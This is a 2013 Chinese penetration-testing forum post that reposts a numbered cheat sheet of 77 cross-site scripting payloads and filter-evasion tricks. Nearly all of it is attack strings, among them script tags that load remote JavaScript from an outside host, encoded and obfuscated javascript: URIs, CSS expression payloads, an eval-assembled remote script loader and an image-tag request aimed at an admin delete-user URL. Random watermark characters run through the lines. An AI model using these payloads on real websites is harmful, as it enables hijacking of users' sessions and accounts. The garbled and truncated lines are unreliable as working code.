中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

---

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少，看见好东西Copy过来，不知道有木有童鞋需要Mark的。
(1)普通的XSS JavaScript注入
, h' [$ b1 S' j" H# n6 _( A<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 ]* g! V  L/ ]+ m3 x(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG标签无分号无引号
4 S/ Y6 v2 F1 [% Y<IMG SRC=javascript:alert(‘XSS’)>
(4)IMG标签大小写不敏感
/ S8 g* e& d* |! k6 b2 S' O<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>
7 B' L3 |: ~+ [(6)修正缺陷IMG标签
$ h7 m9 Q! s6 ^, ]) @4 r<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

' F  c# |' x) @& j0 D/ N- W, \
: m7 Y* [0 A0 S: K, K* t! w! `(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
/ p; P& e. k$ C& l2 y% k1 S<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
/ L+ B$ D' J; h" v. M(10)十六进制编码也是没有分号(计算器)
. r: R, W3 v9 [<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
  a$ Q2 Z* f& ^3 A% `8 ~(11)嵌入式标签,将Javascript分开
! R& r: }- ^( v6 t$ J3 J5 {<IMG SRC=”jav ascript:alert(‘XSS’);”>
  T" N4 a! _( V7 c9 m' B% h4 o. {(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(13)嵌入式换行符
9 \% d0 P, U3 j3 i5 R<IMG SRC=”jav ascript:alert(‘XSS’);”>
(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( w5 ~6 q# h( D(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>
3 w6 Y* }$ U( `; b; D4 s(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
; }. ]; ^0 o( u<script>z=z+’write(“‘</script>
/ Q6 a/ B4 ]' g1 _8 m- T<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
/ ]# L( m/ H0 k- H' \, x4 B. L<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
5 c& ?7 i% I- E<script>eval_r(z)</script>
7 ^) C" _  B( h$ p" K! D3 g(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
(19)Spaces和meta前的IMG标签
8 |+ O* E9 B: x& d; M) e# w<IMG SRC=” javascript:alert(‘XSS’);”>
$ v& y& s- r+ J- U/ @(20)Non-alpha-non-digit XSS
. @$ L: z; P6 B$ p$ G<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 p) J* i/ h5 K  J& ^(21)Non-alpha-non-digit XSS to 2
$ [8 }* N1 u4 q& S& i<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
  v/ e& ~1 ~2 C6 z. i) g(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# m1 |  \# L9 l1 J2 ^5 J7 r( c- K(23)双开括号
4 p5 y8 p; r& |, \. {9 x8 i6 Y! e<<SCRIPT>alert(“XSS”);//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
3 e+ e8 A+ t& [9 x) F9 k- ~<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
% k4 C3 f3 Q* R% Q- A- t% B(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”
9 y( V0 u8 E: f& w( n% e# N(27)双开角括号
9 ]6 V/ d) l, I- F, h0 W: J3 K<iframe src=http://3w.org/XSS.html <
: M/ l$ Q, ^" I5 I3 W5 G(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
4 r1 \  ]3 s- U% j5 w(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: \; M) Y% [+ ]) i- K( T/ N(31)Input Image
7 e2 K' q, C) O) x. v<INPUT SRC=”javascript:alert(‘XSS’);”>
(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
(33)BODY标签
5 `4 I% n3 I4 V! h9 X<BODY(‘XSS’)>
& m: m, u& y( l5 I(34)IMG Dynsrc
5 a4 s9 _( Q, N4 h<IMG DYNSRC=”javascript:alert(‘XSS’)”>
(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
(36)BGSOUND
) Q/ p# j' Q& `- H+ A<BGSOUND SRC=”javascript:alert(‘XSS’);”>
(37)STYLE sheet
. y1 _! b) l6 _# `; N7 b7 W+ {<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
: D$ }+ \0 |  I5 H(38)远程样式表
3 e5 a8 X5 v8 j6 q& w% d<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
, u4 x  `! D) x9 R( C/ A(39)List-style-image(列表式)
4 s! X7 a( i2 K  e<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 s5 |; `% d" x3 N; o(41)META链接url
. a; c+ ]! T& @, ?

<META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>
# H/ h) O4 F; R1 S8 q(42)Iframe
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 Q  i) D- E. U- R' ~8 khttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ p! A& \5 C' Q. x& N6 Y3 r(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
(46)DIV background-image
. O" K0 a: A4 U' m: B<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(48)DIV expression
6 q* N3 M' X3 E( s# \: h/ }<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
  X+ ~1 i& \2 h5 {6 y2 m(49)STYLE属性分拆表达
% A% ~; _3 e: b5 s" x" j4 P! p<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: K& m/ I6 \1 C& t(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
9 |7 h& w5 R* d6 g* V  S* W(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
/ n3 l& b7 F  G8 X, RCLASS=XSS></A>
# N; O; E, Q6 z" j$ ]! p, ](52)IMG STYLE方式
: {. X+ @, M' ~" t* t* b$ Vexppression(alert(“XSS”))’>
  U$ e9 i8 L) p6 V3 z1 Q9 i(53)STYLE background
<STYLE><STYLE
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 V4 C* \" V- O3 `  W, m. _, W9 z(54)BASE
% y! u4 Q; K0 O! }3 U/ j3 E7 f<BASE HREF=”javascript:alert(‘XSS’);//”>
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
& X  k* l; }$ [! m9 o7 x5 _9 P<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
/ y! P+ R' k/ N% yb=”URL(\”";
( {- F2 V7 @! ^' L' J4 E  hc=”javascript:”;
d=”alert(‘XSS’);\”)”;
' H/ G2 c4 E2 s$ jeval_r(a+b+c+d);
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
: \! j  T7 L- [, w<HTML xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
5 y1 ^! a. A6 T( y! m( i( w<xss:xss>XSS</xss:xss>
; \* Z7 X  f! M, O</HTML>
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
  M$ e* @2 X" w0 X3 f, Z2 \9 ~( h<SCRIPT SRC=””></SCRIPT>
(59)IMG嵌入式命令,可执行任意命令
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤
8 B5 z# c# y, z; h, v5 J<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(62)
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) Q# E0 `, c! H$ X( `. ~. @(63)
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
(64)
# `. V4 Z0 h+ X& {5 f8 G7 d3 w/ }<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
(65)
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ N) P" t6 u* f(66)12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
(67)
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
$ I: W0 ~9 w0 X% a7 c: [: G</SCRIPT>
(68)URL绕行
<A HREF=”http://127.0.0.1/”>XSS</A>
5 _$ p# }5 W# J, E(69)URL编码
3 q4 k; s6 m- n7 s8 P<A HREF=”http://3w.org”>XSS</A>
9 K: u$ U/ S/ }9 _% @5 W' r/ F(70)IP十进制
2 O8 o. _& R2 P. Q<A HREF=”http://3232235521″>XSS</A>
(71)IP十六进制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八进制
& s3 S$ e# V9 W, c4 {( I, |: O<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& x% L- f# F7 Y5 \, Y(73)混合编码
<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>
( \, o0 {" a1 n& e(74)节省[http:]
, F5 ~, c! ]+ A- H) ^$ Q5 `<A HREF=”//www.google.com/”>XSS</A>
(75)节省[www]
<A HREF=”http://google.com/”>XSS</A>
' ]6 M$ W7 ~# R% h(76)绝对点绝对DNS
<A HREF=”http://www.google.com./”>XSS</A>
1 K0 G& r1 h) k(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
' l! H5 c0 C6 F- \1 `( }
原文地址：http://fuzzexp.org/u/0day/?p=14
( u/ l7 k% Y; O9 q8 _% Z; f' Y

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2